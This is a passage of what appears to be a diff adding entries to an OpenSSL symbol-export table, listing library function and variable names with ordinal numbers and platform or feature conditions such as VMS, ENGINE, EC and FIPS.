+PKCS7_DIGEST_it                         3107	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_DIGEST_it                         3107	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PKCS12_x5092certbag                     3108	EXIST::FUNCTION:
+EVP_DigestInit_ex                       3109	EXIST::FUNCTION:
+i2a_ACCESS_DESCRIPTION                  3110	EXIST::FUNCTION:
+OCSP_RESPONSE_it                        3111	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_RESPONSE_it                        3111	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PKCS7_ENC_CONTENT_it                    3112	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ENC_CONTENT_it                    3112	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_request_add0_id                    3113	EXIST::FUNCTION:
+EC_POINT_make_affine                    3114	EXIST::FUNCTION:EC
+DSO_get_filename                        3115	EXIST::FUNCTION:
+OCSP_CERTSTATUS_it                      3116	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_CERTSTATUS_it                      3116	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_request_add1_cert                  3117	EXIST::FUNCTION:
+UI_get0_output_string                   3118	EXIST::FUNCTION:
+UI_dup_verify_string                    3119	EXIST::FUNCTION:
+BN_mod_lshift                           3120	EXIST::FUNCTION:
+KRB5_AUTHDATA_it                        3121	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_AUTHDATA_it                        3121	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+asn1_set_choice_selector                3122	EXIST::FUNCTION:
+OCSP_basic_add1_status                  3123	EXIST::FUNCTION:
+OCSP_RESPID_free                        3124	EXIST::FUNCTION:
+asn1_get_field_ptr                      3125	EXIST::FUNCTION:
+UI_add_input_string                     3126	EXIST::FUNCTION:
+OCSP_CRLID_it                           3127	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_CRLID_it                           3127	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+i2d_KRB5_AUTHENTBODY                    3128	EXIST::FUNCTION:
+OCSP_REQUEST_get_ext_count              3129	EXIST::FUNCTION:
+ENGINE_load_atalla                      3130	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+X509_NAME_it                            3131	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_NAME_it                            3131	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+USERNOTICE_it                           3132	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+USERNOTICE_it                           3132	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_REQINFO_new                        3133	EXIST::FUNCTION:
+OCSP_BASICRESP_get_ext                  3134	EXIST::FUNCTION:
+CRYPTO_get_ex_data_implementation       3135	EXIST:!VMS:FUNCTION:
+CRYPTO_get_ex_data_impl                 3135	EXIST:VMS:FUNCTION:
+ASN1_item_pack                          3136	EXIST::FUNCTION:
+i2d_KRB5_ENCDATA                        3137	EXIST::FUNCTION:
+X509_PURPOSE_set                        3138	EXIST::FUNCTION:
+X509_REQ_INFO_it                        3139	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_REQ_INFO_it                        3139	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_method_set_opener                    3140	EXIST::FUNCTION:
+ASN1_item_ex_free                       3141	EXIST::FUNCTION:
+ASN1_BOOLEAN_it                         3142	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_BOOLEAN_it                         3142	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_get_table_flags                  3143	EXIST::FUNCTION:ENGINE
+UI_create_method                        3144	EXIST::FUNCTION:
+OCSP_ONEREQ_add1_ext_i2d                3145	EXIST::FUNCTION:
+_shadow_DES_check_key                   3146	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:DES
+_shadow_DES_check_key                   3146	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:DES
+d2i_OCSP_REQINFO                        3147	EXIST::FUNCTION:
+UI_add_info_string                      3148	EXIST::FUNCTION:
+UI_get_result_minsize                   3149	EXIST::FUNCTION:
+ASN1_NULL_it                            3150	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_NULL_it                            3150	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+BN_mod_lshift1                          3151	EXIST::FUNCTION:
+d2i_OCSP_ONEREQ                         3152	EXIST::FUNCTION:
+OCSP_ONEREQ_new                         3153	EXIST::FUNCTION:
+KRB5_TICKET_it                          3154	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_TICKET_it                          3154	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_aes_192_cbc                         3155	EXIST::FUNCTION:AES
+KRB5_TICKET_free                        3156	EXIST::FUNCTION:
+UI_new                                  3157	EXIST::FUNCTION:
+OCSP_response_create                    3158	EXIST::FUNCTION:
+_ossl_old_des_xcbc_encrypt              3159	EXIST::FUNCTION:DES
+PKCS7_it                                3160	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_it                                3160	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_REQUEST_get_ext_by_critical        3161	EXIST:!VMS:FUNCTION:
+OCSP_REQUEST_get_ext_by_crit            3161	EXIST:VMS:FUNCTION:
+ENGINE_set_flags                        3162	EXIST::FUNCTION:ENGINE
+_ossl_old_des_ecb_encrypt               3163	EXIST::FUNCTION:DES
+OCSP_response_get1_basic                3164	EXIST::FUNCTION:
+EVP_Digest                              3165	EXIST::FUNCTION:
+OCSP_ONEREQ_delete_ext                  3166	EXIST::FUNCTION:
+ASN1_TBOOLEAN_it                        3167	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_TBOOLEAN_it                        3167	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_item_new                           3168	EXIST::FUNCTION:
+ASN1_TIME_to_generalizedtime            3169	EXIST::FUNCTION:
+BIGNUM_it                               3170	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+BIGNUM_it                               3170	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+AES_cbc_encrypt                         3171	EXIST::FUNCTION:AES
+ENGINE_get_load_privkey_function        3172	EXIST:!VMS:FUNCTION:ENGINE
+ENGINE_get_load_privkey_fn              3172	EXIST:VMS:FUNCTION:ENGINE
+OCSP_RESPONSE_free                      3173	EXIST::FUNCTION:
+UI_method_set_reader                    3174	EXIST::FUNCTION:
+i2d_ASN1_T61STRING                      3175	EXIST::FUNCTION:
+EC_POINT_set_to_infinity                3176	EXIST::FUNCTION:EC
+ERR_load_OCSP_strings                   3177	EXIST::FUNCTION:
+EC_POINT_point2oct                      3178	EXIST::FUNCTION:EC
+KRB5_APREQ_free                         3179	EXIST::FUNCTION:
+ASN1_OBJECT_it                          3180	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_OBJECT_it                          3180	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_crlID_new                          3181	EXIST:!OS2,!VMS:FUNCTION:
+OCSP_crlID2_new                         3181	EXIST:OS2,VMS:FUNCTION:
+CONF_modules_load_file                  3182	EXIST::FUNCTION:
+CONF_imodule_set_usr_data               3183	EXIST::FUNCTION:
+ENGINE_set_default_string               3184	EXIST::FUNCTION:ENGINE
+CONF_module_get_usr_data                3185	EXIST::FUNCTION:
+ASN1_add_oid_module                     3186	EXIST::FUNCTION:
+CONF_modules_finish                     3187	EXIST::FUNCTION:
+OPENSSL_config                          3188	EXIST::FUNCTION:
+CONF_modules_unload                     3189	EXIST::FUNCTION:
+CONF_imodule_get_value                  3190	EXIST::FUNCTION:
+CONF_module_set_usr_data                3191	EXIST::FUNCTION:
+CONF_parse_list                         3192	EXIST::FUNCTION:
+CONF_module_add                         3193	EXIST::FUNCTION:
+CONF_get1_default_config_file           3194	EXIST::FUNCTION:
+CONF_imodule_get_flags                  3195	EXIST::FUNCTION:
+CONF_imodule_get_module                 3196	EXIST::FUNCTION:
+CONF_modules_load                       3197	EXIST::FUNCTION:
+CONF_imodule_get_name                   3198	EXIST::FUNCTION:
+ERR_peek_top_error                      3199	NOEXIST::FUNCTION:
+CONF_imodule_get_usr_data               3200	EXIST::FUNCTION:
+CONF_imodule_set_flags                  3201	EXIST::FUNCTION:
+ENGINE_add_conf_module                  3202	EXIST::FUNCTION:ENGINE
+ERR_peek_last_error_line                3203	EXIST::FUNCTION:
+ERR_peek_last_error_line_data           3204	EXIST::FUNCTION:
+ERR_peek_last_error                     3205	EXIST::FUNCTION:
+DES_read_2passwords                     3206	EXIST::FUNCTION:DES
+DES_read_password                       3207	EXIST::FUNCTION:DES
+UI_UTIL_read_pw                         3208	EXIST::FUNCTION:
+UI_UTIL_read_pw_string                  3209	EXIST::FUNCTION:
+ENGINE_load_aep                         3210	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+ENGINE_load_sureware                    3211	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+OPENSSL_add_all_algorithms_noconf       3212	EXIST:!VMS:FUNCTION:
+OPENSSL_add_all_algo_noconf             3212	EXIST:VMS:FUNCTION:
+OPENSSL_add_all_algorithms_conf         3213	EXIST:!VMS:FUNCTION:
+OPENSSL_add_all_algo_conf               3213	EXIST:VMS:FUNCTION:
+OPENSSL_load_builtin_modules            3214	EXIST::FUNCTION:
+AES_ofb128_encrypt                      3215	EXIST::FUNCTION:AES
+AES_ctr128_encrypt                      3216	EXIST::FUNCTION:AES
+AES_cfb128_encrypt                      3217	EXIST::FUNCTION:AES
+ENGINE_load_4758cca                     3218	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+_ossl_096_des_random_seed               3219	EXIST::FUNCTION:DES
+EVP_aes_256_ofb                         3220	EXIST::FUNCTION:AES
+EVP_aes_192_ofb                         3221	EXIST::FUNCTION:AES
+EVP_aes_128_cfb128                      3222	EXIST::FUNCTION:AES
+EVP_aes_256_cfb128                      3223	EXIST::FUNCTION:AES
+EVP_aes_128_ofb                         3224	EXIST::FUNCTION:AES
+EVP_aes_192_cfb128                      3225	EXIST::FUNCTION:AES
+CONF_modules_free                       3226	EXIST::FUNCTION:
+NCONF_default                           3227	EXIST::FUNCTION:
+OPENSSL_no_config                       3228	EXIST::FUNCTION:
+NCONF_WIN32                             3229	EXIST::FUNCTION:
+ASN1_UNIVERSALSTRING_new                3230	EXIST::FUNCTION:
+EVP_des_ede_ecb                         3231	EXIST::FUNCTION:DES
+i2d_ASN1_UNIVERSALSTRING                3232	EXIST::FUNCTION:
+ASN1_UNIVERSALSTRING_free               3233	EXIST::FUNCTION:
+ASN1_UNIVERSALSTRING_it                 3234	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_UNIVERSALSTRING_it                 3234	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_ASN1_UNIVERSALSTRING                3235	EXIST::FUNCTION:
+EVP_des_ede3_ecb                        3236	EXIST::FUNCTION:DES
+X509_REQ_print_ex                       3237	EXIST::FUNCTION:BIO
+ENGINE_up_ref                           3238	EXIST::FUNCTION:ENGINE
+BUF_MEM_grow_clean                      3239	EXIST::FUNCTION:
+CRYPTO_realloc_clean                    3240	EXIST::FUNCTION:
+BUF_strlcat                             3241	EXIST::FUNCTION:
+BIO_indent                              3242	EXIST::FUNCTION:
+BUF_strlcpy                             3243	EXIST::FUNCTION:
+OpenSSLDie                              3244	EXIST::FUNCTION:
+OPENSSL_cleanse                         3245	EXIST::FUNCTION:
+ENGINE_setup_bsd_cryptodev              3246	EXIST:__FreeBSD__:FUNCTION:ENGINE
+ERR_release_err_state_table             3247	EXIST::FUNCTION:LHASH
+EVP_aes_128_cfb8                        3248	EXIST::FUNCTION:AES
+FIPS_corrupt_rsa                        3249	NOEXIST::FUNCTION:
+FIPS_selftest_des                       3250	NOEXIST::FUNCTION:
+EVP_aes_128_cfb1                        3251	EXIST::FUNCTION:AES
+EVP_aes_192_cfb8                        3252	EXIST::FUNCTION:AES
+FIPS_mode_set                           3253	EXIST::FUNCTION:
+FIPS_selftest_dsa                       3254	NOEXIST::FUNCTION:
+EVP_aes_256_cfb8                        3255	EXIST::FUNCTION:AES
+FIPS_allow_md5                          3256	NOEXIST::FUNCTION:
+DES_ede3_cfb_encrypt                    3257	EXIST::FUNCTION:DES
+EVP_des_ede3_cfb8                       3258	EXIST::FUNCTION:DES
+FIPS_rand_seeded                        3259	NOEXIST::FUNCTION:
+AES_cfbr_encrypt_block                  3260	NOEXIST::FUNCTION:
+AES_cfb8_encrypt                        3261	EXIST::FUNCTION:AES
+FIPS_rand_seed                          3262	NOEXIST::FUNCTION:
+FIPS_corrupt_des                        3263	NOEXIST::FUNCTION:
+EVP_aes_192_cfb1                        3264	EXIST::FUNCTION:AES
+FIPS_selftest_aes                       3265	NOEXIST::FUNCTION:
+FIPS_set_prng_key                       3266	NOEXIST::FUNCTION:
+EVP_des_cfb8                            3267	EXIST::FUNCTION:DES
+FIPS_corrupt_dsa                        3268	NOEXIST::FUNCTION:
+FIPS_test_mode                          3269	NOEXIST::FUNCTION:
+FIPS_rand_method                        3270	NOEXIST::FUNCTION:
+EVP_aes_256_cfb1                        3271	EXIST::FUNCTION:AES
+ERR_load_FIPS_strings                   3272	NOEXIST::FUNCTION:
+FIPS_corrupt_aes                        3273	NOEXIST::FUNCTION:
+FIPS_selftest_sha1                      3274	NOEXIST::FUNCTION:
+FIPS_selftest_rsa                       3275	NOEXIST::FUNCTION:
+FIPS_corrupt_sha1                       3276	NOEXIST::FUNCTION:
+EVP_des_cfb1                            3277	EXIST::FUNCTION:DES
+FIPS_dsa_check                          3278	NOEXIST::FUNCTION:
+AES_cfb1_encrypt                        3279	EXIST::FUNCTION:AES
+EVP_des_ede3_cfb1                       3280	EXIST::FUNCTION:DES
+FIPS_rand_check                         3281	NOEXIST::FUNCTION:
+FIPS_md5_allowed                        3282	NOEXIST::FUNCTION:
+FIPS_mode                               3283	EXIST::FUNCTION:
+FIPS_selftest_failed                    3284	NOEXIST::FUNCTION:
+sk_is_sorted                            3285	EXIST::FUNCTION:
+X509_check_ca                           3286	EXIST::FUNCTION:
+private_idea_set_encrypt_key            3287	EXIST:OPENSSL_FIPS:FUNCTION:IDEA
+HMAC_CTX_set_flags                      3288	EXIST::FUNCTION:HMAC
+private_SHA_Init                        3289	EXIST:OPENSSL_FIPS:FUNCTION:SHA,SHA0
+private_CAST_set_key                    3290	EXIST:OPENSSL_FIPS:FUNCTION:CAST
+private_RIPEMD160_Init                  3291	EXIST:OPENSSL_FIPS:FUNCTION:RIPEMD
+private_RC5_32_set_key                  3292	NOEXIST::FUNCTION:
+private_MD5_Init                        3293	EXIST:OPENSSL_FIPS:FUNCTION:MD5
+private_RC4_set_key                     3294	EXIST::FUNCTION:RC4
+private_MDC2_Init                       3295	EXIST:OPENSSL_FIPS:FUNCTION:MDC2
+private_RC2_set_key                     3296	EXIST:OPENSSL_FIPS:FUNCTION:RC2
+private_MD4_Init                        3297	EXIST:OPENSSL_FIPS:FUNCTION:MD4
+private_BF_set_key                      3298	EXIST:OPENSSL_FIPS:FUNCTION:BF
+private_MD2_Init                        3299	EXIST:OPENSSL_FIPS:FUNCTION:MD2
+d2i_PROXY_CERT_INFO_EXTENSION           3300	EXIST::FUNCTION:
+PROXY_POLICY_it                         3301	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PROXY_POLICY_it                         3301	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+i2d_PROXY_POLICY                        3302	EXIST::FUNCTION:
+i2d_PROXY_CERT_INFO_EXTENSION           3303	EXIST::FUNCTION:
+d2i_PROXY_POLICY                        3304	EXIST::FUNCTION:
+PROXY_CERT_INFO_EXTENSION_new           3305	EXIST::FUNCTION:
+PROXY_CERT_INFO_EXTENSION_free          3306	EXIST::FUNCTION:
+PROXY_CERT_INFO_EXTENSION_it            3307	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PROXY_CERT_INFO_EXTENSION_it            3307	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PROXY_POLICY_free                       3308	EXIST::FUNCTION:
+PROXY_POLICY_new                        3309	EXIST::FUNCTION:
+BN_MONT_CTX_set_locked                  3310	EXIST::FUNCTION:
+FIPS_selftest_rng                       3311	NOEXIST::FUNCTION:
+EVP_sha384                              3312	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+EVP_sha512                              3313	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+EVP_sha224                              3314	EXIST::FUNCTION:SHA,SHA256
+EVP_sha256                              3315	EXIST::FUNCTION:SHA,SHA256
+FIPS_selftest_hmac                      3316	NOEXIST::FUNCTION:
+FIPS_corrupt_rng                        3317	NOEXIST::FUNCTION:
+BN_mod_exp_mont_consttime               3318	EXIST::FUNCTION:
+RSA_X931_hash_id                        3319	EXIST::FUNCTION:RSA
+RSA_padding_check_X931                  3320	EXIST::FUNCTION:RSA
+RSA_verify_PKCS1_PSS                    3321	EXIST::FUNCTION:RSA
+RSA_padding_add_X931                    3322	EXIST::FUNCTION:RSA
+RSA_padding_add_PKCS1_PSS               3323	EXIST::FUNCTION:RSA
+PKCS1_MGF1                              3324	EXIST::FUNCTION:RSA
+BN_X931_generate_Xpq                    3325	EXIST::FUNCTION:
+RSA_X931_generate_key                   3326	NOEXIST::FUNCTION:
+BN_X931_derive_prime                    3327	NOEXIST::FUNCTION:
+BN_X931_generate_prime                  3328	NOEXIST::FUNCTION:
+RSA_X931_derive                         3329	NOEXIST::FUNCTION:
+BIO_new_dgram                           3330	EXIST::FUNCTION:
+BN_get0_nist_prime_384                  3331	EXIST::FUNCTION:
+ERR_set_mark                            3332	EXIST::FUNCTION:
+X509_STORE_CTX_set0_crls                3333	EXIST::FUNCTION:
+ENGINE_set_STORE                        3334	EXIST::FUNCTION:ENGINE
+ENGINE_register_ECDSA                   3335	EXIST::FUNCTION:ENGINE
+STORE_meth_set_list_start_fn            3336	NOEXIST::FUNCTION:
+STORE_method_set_list_start_function    3336	NOEXIST::FUNCTION:
+BN_BLINDING_invert_ex                   3337	EXIST::FUNCTION:
+NAME_CONSTRAINTS_free                   3338	EXIST::FUNCTION:
+STORE_ATTR_INFO_set_number              3339	NOEXIST::FUNCTION:
+BN_BLINDING_get_thread_id               3340	EXIST::FUNCTION:DEPRECATED
+X509_STORE_CTX_set0_param               3341	EXIST::FUNCTION:
+POLICY_MAPPING_it                       3342	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+POLICY_MAPPING_it                       3342	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+STORE_parse_attrs_start                 3343	NOEXIST::FUNCTION:
+POLICY_CONSTRAINTS_free                 3344	EXIST::FUNCTION:
+EVP_PKEY_add1_attr_by_NID               3345	EXIST::FUNCTION:
+BN_nist_mod_192                         3346	EXIST::FUNCTION:
+EC_GROUP_get_trinomial_basis            3347	EXIST::FUNCTION:EC,EC2M
+STORE_set_method                        3348	NOEXIST::FUNCTION:
+GENERAL_SUBTREE_free                    3349	EXIST::FUNCTION:
+NAME_CONSTRAINTS_it                     3350	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NAME_CONSTRAINTS_it                     3350	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ECDH_get_default_method                 3351	EXIST::FUNCTION:ECDH
+PKCS12_add_safe                         3352	EXIST::FUNCTION:
+EC_KEY_new_by_curve_name                3353	EXIST::FUNCTION:EC
+STORE_meth_get_update_store_fn          3354	NOEXIST::FUNCTION:
+STORE_method_get_update_store_function  3354	NOEXIST::FUNCTION:
+ENGINE_register_ECDH                    3355	EXIST::FUNCTION:ENGINE
+SHA512_Update                           3356	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+i2d_ECPrivateKey                        3357	EXIST::FUNCTION:EC
+BN_get0_nist_prime_192                  3358	EXIST::FUNCTION:
+STORE_modify_certificate                3359	NOEXIST::FUNCTION:
+EC_POINT_set_affine_coordinates_GF2m    3360	EXIST:!VMS:FUNCTION:EC,EC2M
+EC_POINT_set_affine_coords_GF2m         3360	EXIST:VMS:FUNCTION:EC,EC2M
+BN_GF2m_mod_exp_arr                     3361	EXIST::FUNCTION:EC2M
+STORE_ATTR_INFO_modify_number           3362	NOEXIST::FUNCTION:
+X509_keyid_get0                         3363	EXIST::FUNCTION:
+ENGINE_load_gmp                         3364	EXIST::FUNCTION:ENGINE,GMP,STATIC_ENGINE
+pitem_new                               3365	EXIST::FUNCTION:
+BN_GF2m_mod_mul_arr                     3366	EXIST::FUNCTION:EC2M
+STORE_list_public_key_endp              3367	NOEXIST::FUNCTION:
+o2i_ECPublicKey                         3368	EXIST::FUNCTION:EC
+EC_KEY_copy                             3369	EXIST::FUNCTION:EC
+BIO_dump_fp                             3370	EXIST::FUNCTION:FP_API
+X509_policy_node_get0_parent            3371	EXIST::FUNCTION:
+EC_GROUP_check_discriminant             3372	EXIST::FUNCTION:EC
+i2o_ECPublicKey                         3373	EXIST::FUNCTION:EC
+EC_KEY_precompute_mult                  3374	EXIST::FUNCTION:EC
+a2i_IPADDRESS                           3375	EXIST::FUNCTION:
+STORE_meth_set_initialise_fn            3376	NOEXIST::FUNCTION:
+STORE_method_set_initialise_function    3376	NOEXIST::FUNCTION:
+X509_STORE_CTX_set_depth                3377	EXIST::FUNCTION:
+X509_VERIFY_PARAM_inherit               3378	EXIST::FUNCTION:
+EC_POINT_point2bn                       3379	EXIST::FUNCTION:EC
+STORE_ATTR_INFO_set_dn                  3380	NOEXIST::FUNCTION:
+X509_policy_tree_get0_policies          3381	EXIST::FUNCTION:
+EC_GROUP_new_curve_GF2m                 3382	EXIST::FUNCTION:EC,EC2M
+STORE_destroy_method                    3383	NOEXIST::FUNCTION:
+ENGINE_unregister_STORE                 3384	EXIST::FUNCTION:ENGINE
+EVP_PKEY_get1_EC_KEY                    3385	EXIST::FUNCTION:EC
+STORE_ATTR_INFO_get0_number             3386	NOEXIST::FUNCTION:
+ENGINE_get_default_ECDH                 3387	EXIST::FUNCTION:ENGINE
+EC_KEY_get_conv_form                    3388	EXIST::FUNCTION:EC
+ASN1_OCTET_STRING_NDEF_it               3389	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_OCTET_STRING_NDEF_it               3389	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+STORE_delete_public_key                 3390	NOEXIST::FUNCTION:
+STORE_get_public_key                    3391	NOEXIST::FUNCTION:
+STORE_modify_arbitrary                  3392	NOEXIST::FUNCTION:
+ENGINE_get_static_state                 3393	EXIST::FUNCTION:ENGINE
+pqueue_iterator                         3394	EXIST::FUNCTION:
+ECDSA_SIG_new                           3395	EXIST::FUNCTION:ECDSA
+OPENSSL_DIR_end                         3396	EXIST::FUNCTION:
+BN_GF2m_mod_sqr                         3397	EXIST::FUNCTION:EC2M
+EC_POINT_bn2point                       3398	EXIST::FUNCTION:EC
+X509_VERIFY_PARAM_set_depth             3399	EXIST::FUNCTION:
+EC_KEY_set_asn1_flag                    3400	EXIST::FUNCTION:EC
+STORE_get_method                        3401	NOEXIST::FUNCTION:
+EC_KEY_get_key_method_data              3402	EXIST::FUNCTION:EC
+ECDSA_sign_ex                           3403	EXIST::FUNCTION:ECDSA
+STORE_parse_attrs_end                   3404	NOEXIST::FUNCTION:
+EC_GROUP_get_point_conversion_form      3405	EXIST:!VMS:FUNCTION:EC
+EC_GROUP_get_point_conv_form            3405	EXIST:VMS:FUNCTION:EC
+STORE_method_set_store_function         3406	NOEXIST::FUNCTION:
+STORE_ATTR_INFO_in                      3407	NOEXIST::FUNCTION:
+PEM_read_bio_ECPKParameters             3408	EXIST::FUNCTION:EC
+EC_GROUP_get_pentanomial_basis          3409	EXIST::FUNCTION:EC,EC2M
+EVP_PKEY_add1_attr_by_txt               3410	EXIST::FUNCTION:
+BN_BLINDING_set_flags                   3411	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_policies         3412	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set1_name             3413	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set_purpose           3414	EXIST::FUNCTION:
+STORE_get_number                        3415	NOEXIST::FUNCTION:
+ECDSA_sign_setup                        3416	EXIST::FUNCTION:ECDSA
+BN_GF2m_mod_solve_quad_arr              3417	EXIST::FUNCTION:EC2M
+EC_KEY_up_ref                           3418	EXIST::FUNCTION:EC
+POLICY_MAPPING_free                     3419	EXIST::FUNCTION:
+BN_GF2m_mod_div                         3420	EXIST::FUNCTION:EC2M
+X509_VERIFY_PARAM_set_flags             3421	EXIST::FUNCTION:
+EC_KEY_free                             3422	EXIST::FUNCTION:EC
+STORE_meth_set_list_next_fn             3423	NOEXIST::FUNCTION:
+STORE_method_set_list_next_function     3423	NOEXIST::FUNCTION:
+PEM_write_bio_ECPrivateKey              3424	EXIST::FUNCTION:EC
+d2i_EC_PUBKEY                           3425	EXIST::FUNCTION:EC
+STORE_meth_get_generate_fn              3426	NOEXIST::FUNCTION:
+STORE_method_get_generate_function      3426	NOEXIST::FUNCTION:
+STORE_meth_set_list_end_fn              3427	NOEXIST::FUNCTION:
+STORE_method_set_list_end_function      3427	NOEXIST::FUNCTION:
+pqueue_print                            3428	EXIST::FUNCTION:
+EC_GROUP_have_precompute_mult           3429	EXIST::FUNCTION:EC
+EC_KEY_print_fp                         3430	EXIST::FUNCTION:EC,FP_API
+BN_GF2m_mod_arr                         3431	EXIST::FUNCTION:EC2M
+PEM_write_bio_X509_CERT_PAIR            3432	EXIST::FUNCTION:
+EVP_PKEY_cmp                            3433	EXIST::FUNCTION:
+X509_policy_level_node_count            3434	EXIST::FUNCTION:
+STORE_new_engine                        3435	NOEXIST::FUNCTION:
+STORE_list_public_key_start             3436	NOEXIST::FUNCTION:
+X509_VERIFY_PARAM_new                   3437	EXIST::FUNCTION:
+ECDH_get_ex_data                        3438	EXIST::FUNCTION:ECDH
+EVP_PKEY_get_attr                       3439	EXIST::FUNCTION:
+ECDSA_do_sign                           3440	EXIST::FUNCTION:ECDSA
+ENGINE_unregister_ECDH                  3441	EXIST::FUNCTION:ENGINE
+ECDH_OpenSSL                            3442	EXIST::FUNCTION:ECDH
+EC_KEY_set_conv_form                    3443	EXIST::FUNCTION:EC
+EC_POINT_dup                            3444	EXIST::FUNCTION:EC
+GENERAL_SUBTREE_new                     3445	EXIST::FUNCTION:
+STORE_list_crl_endp                     3446	NOEXIST::FUNCTION:
+EC_get_builtin_curves                   3447	EXIST::FUNCTION:EC
+X509_policy_node_get0_qualifiers        3448	EXIST:!VMS:FUNCTION:
+X509_pcy_node_get0_qualifiers           3448	EXIST:VMS:FUNCTION:
+STORE_list_crl_end                      3449	NOEXIST::FUNCTION:
+EVP_PKEY_set1_EC_KEY                    3450	EXIST::FUNCTION:EC
+BN_GF2m_mod_sqrt_arr                    3451	EXIST::FUNCTION:EC2M
+i2d_ECPrivateKey_bio                    3452	EXIST::FUNCTION:BIO,EC
+ECPKParameters_print_fp                 3453	EXIST::FUNCTION:EC,FP_API
+pqueue_find                             3454	EXIST::FUNCTION:
+ECDSA_SIG_free                          3455	EXIST::FUNCTION:ECDSA
+PEM_write_bio_ECPKParameters            3456	EXIST::FUNCTION:EC
+STORE_method_set_ctrl_function          3457	NOEXIST::FUNCTION:
+STORE_list_public_key_end               3458	NOEXIST::FUNCTION:
+EC_KEY_set_private_key                  3459	EXIST::FUNCTION:EC
+pqueue_peek                             3460	EXIST::FUNCTION:
+STORE_get_arbitrary                     3461	NOEXIST::FUNCTION:
+STORE_store_crl                         3462	NOEXIST::FUNCTION:
+X509_policy_node_get0_policy            3463	EXIST::FUNCTION:
+PKCS12_add_safes                        3464	EXIST::FUNCTION:
+BN_BLINDING_convert_ex                  3465	EXIST::FUNCTION:
+X509_policy_tree_free                   3466	EXIST::FUNCTION:
+OPENSSL_ia32cap_loc                     3467	EXIST::FUNCTION:
+BN_GF2m_poly2arr                        3468	EXIST::FUNCTION:EC2M
+STORE_ctrl                              3469	NOEXIST::FUNCTION:
+STORE_ATTR_INFO_compare                 3470	NOEXIST::FUNCTION:
+BN_get0_nist_prime_224                  3471	EXIST::FUNCTION:
+i2d_ECParameters                        3472	EXIST::FUNCTION:EC
+i2d_ECPKParameters                      3473	EXIST::FUNCTION:EC
+BN_GENCB_call                           3474	EXIST::FUNCTION:
+d2i_ECPKParameters                      3475	EXIST::FUNCTION:EC
+STORE_meth_set_generate_fn              3476	NOEXIST::FUNCTION:
+STORE_method_set_generate_function      3476	NOEXIST::FUNCTION:
+ENGINE_set_ECDH                         3477	EXIST::FUNCTION:ENGINE
+NAME_CONSTRAINTS_new                    3478	EXIST::FUNCTION:
+SHA256_Init                             3479	EXIST::FUNCTION:SHA,SHA256
+EC_KEY_get0_public_key                  3480	EXIST::FUNCTION:EC
+PEM_write_bio_EC_PUBKEY                 3481	EXIST::FUNCTION:EC
+STORE_ATTR_INFO_set_cstr                3482	NOEXIST::FUNCTION:
+STORE_list_crl_next                     3483	NOEXIST::FUNCTION:
+STORE_ATTR_INFO_in_range                3484	NOEXIST::FUNCTION:
+ECParameters_print                      3485	EXIST::FUNCTION:BIO,EC
+STORE_meth_set_delete_fn                3486	NOEXIST::FUNCTION:
+STORE_method_set_delete_function        3486	NOEXIST::FUNCTION:
